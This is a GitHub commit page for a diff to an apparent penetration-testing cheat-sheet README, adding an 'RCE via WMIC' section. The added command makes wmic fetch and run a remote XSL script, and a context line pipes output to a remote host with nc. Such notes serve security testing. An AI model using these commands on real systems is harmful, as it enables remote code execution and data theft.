Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
adon90 authored May 22, 2018
1 parent fa8a468 commit 1526dcc
Showing 1 changed file with 7 additions and 0 deletions.
7 changes: 7 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -14,6 +14,7 @@
* [RCE](#rce)
* [PHP RCE](#phprce)
* [RCE via webshell](#rcewebshell)
* [RCE WMIC](#rcewmic)
- [Privilege Escalation](#privesc)
* [Linux](#linux)
* [Windows](#windows)
Expand Down Expand Up @@ -206,6 +207,12 @@ file upload evasion: rot13 + urlencode
- Metasploit `web_delivery` module

- which wget | nc <ip> <port>

<a name="rcewmic"></a><h3>RCE via WMIC</h3>

Powershell without powershell:

<pre>wmic process get brief /format:"https://raw.githubusercontent.com/adon90/pentest_compilation/master/pswops.xsl"</pre>


<a name="privesc"></a><h2> Privilege Escalation</h2>
Expand Down

0 comments on commit 1526dcc

Please sign in to comment.